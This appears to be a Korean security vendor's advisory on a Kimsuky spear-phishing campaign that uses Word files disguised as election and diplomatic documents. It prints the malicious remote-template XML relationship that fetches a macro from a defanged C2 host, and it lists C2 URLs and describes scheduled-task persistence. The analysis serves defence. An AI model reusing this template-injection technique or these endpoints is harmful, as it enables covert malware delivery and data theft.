안녕하세요. 이스트시큐리티 ESRC(시큐리티 대응센터)입니다.
김수키(Kimsuky) 조직의 '스모크 스크린' 캠페인의 일환으로 추정되는 공격이 또 한번 포착되어 사용자들의 주의가 필요합니다.
이번 공격에 사용된 악성 파일은 '21대 국회의원 선거 관련.docx', '외교문서 관련(이재춘국장).docx' 파일을 위장하고 있습니다.
이번에 발견된 두 개의 악성 워드파일들의 파일명은 다르지만, 동작방식은 동일합니다.
먼저 악성 DOCX 문서가 실행되면, 아래와 같은 내부 'settings.xml.rels' 명령이 작동하고, 악성 매크로 함수실행을 위해 특정 미리네 호스팅 C2 서버로 통신을 시도합니다.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://saemaeul[.]mireene.com/skin/board/basic/bin" TargetMode="External"/>
</Relationships>
DOCX 문서 파일의 작성자는 'seong jin lee' 이름이 등록되어 있으며, 마지막 수정자는 'Robot Karll' 입니다.
<dc:creator>seong jin lee</dc:creator>
<cp:keywords/>
<dc:description/>
<cp:lastModifiedBy>Robot Karll</cp:lastModifiedBy>
<cp:revision>6</cp:revision>
<cp:lastPrinted>2020-04-01T07:10:00Z</cp:lastPrinted>
<dcterms:created xsi:type="dcterms:W3CDTF">2020-04-01T06:01:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-03T00:14:00Z</dcterms:modified>
</cp:coreProperties>
그리고 다음과 같이 [콘텐츠 사용] 버튼 클릭을 유도하는 문구를 보여줍니다. 만약 C2 서버와 통신이 실패하면 [콘텐츠 사용] 버튼은 나타나지 않습니다.
[그림 1] C2 서버 'saemaeul.mireene[.]com 서버와 통신해 매크로 실행 유도하는 과정
사용자가 [콘텐츠 사용] 버튼을 클릭해 실행하면, 사용자에게는 다음과 같은 워드문서의 내용이 보이게 됩니다.
[그림 2] 21대 국회의원 선거 관련 내용이 담긴 악성 문서 화면
[그림 3] 외교 및 총선 관련 내용이 담긴 악성 문서 화면
악성 매크로가 실행되면, '.NETFramework4.xml' 파일 이름으로 추가 명령을 생성합니다.
[그림 4] XML 내부 화면
그리고 윈도우 운영체제 정품인증 키관리 서비스(Key Management Service)처럼 KMSAuto 이름으로 작업 스케줄러에 등록해 자동으로 실행되도록 설정합니다.
[그림 5] 작업스케줄러 명령어 화면
C2 명령제어 서버와 다음과 같이 통신을 시도하며, 공격자의 추가 명령에 따라 다양한 정보유출이 진행될 수 있습니다.
http://saemaeul.mireene[.]com/skin/board/basic/bin
http://saemaeul.mireene[.]com/skin/board/basic/bin/report.php
http://saemaeul.mireene[.]com/skin/board/basic/bin/down.php?op=1
http://saemaeul.mireene[.]com/skin/board/basic/bin/down.php?op=2
http://saemaeul.mireene[.]com/skin/visit/basic/log
http://saemaeul.mireene[.]com/skin/visit/basic/log/report.php
http://saemaeul.mireene[.]com/skin/visit/basic/log/down.php?op=1
http://saemaeul.mireene[.]com/skin/visit/basic/log/down.php?op=2
올해 초부터 김수키(Kimsuky) 조직은 국내 기업/기관 등을 대상으로 지속적으로 스모크 스크린 캠페인을 벌이고 있습니다.
이에 기업 및 기관 사용자들의 각별한 주의가 필요합니다.
현재 알약에서는 해당 악성코드에 대해 Exploit.MSOffice.Gen, Trojan.Agent.183268E로 탐지중에 있습니다.
관련 IoC는 쓰렛인싸이드에서 확인하실 수 있습니다.
비너스락커 조직, 또 다시 Makop 랜섬웨어 변종 유포 중! (0) | 2020.04.13 |
---|---|
애플 사용자를 대상으로 한 피싱 공격 주의!! (0) | 2020.04.10 |
코로나 이슈 '긴급재난자금' 상품권을 사칭한 스미싱 공격 주의! (0) | 2020.04.09 |
코로나19 바이러스 키워드로 국내 기업에 유입중인 영문 이메일 주의! (0) | 2020.04.08 |
경찰청을 사칭하여 유포중인 악성 이메일 주의! (0) | 2020.04.08 |
댓글 영역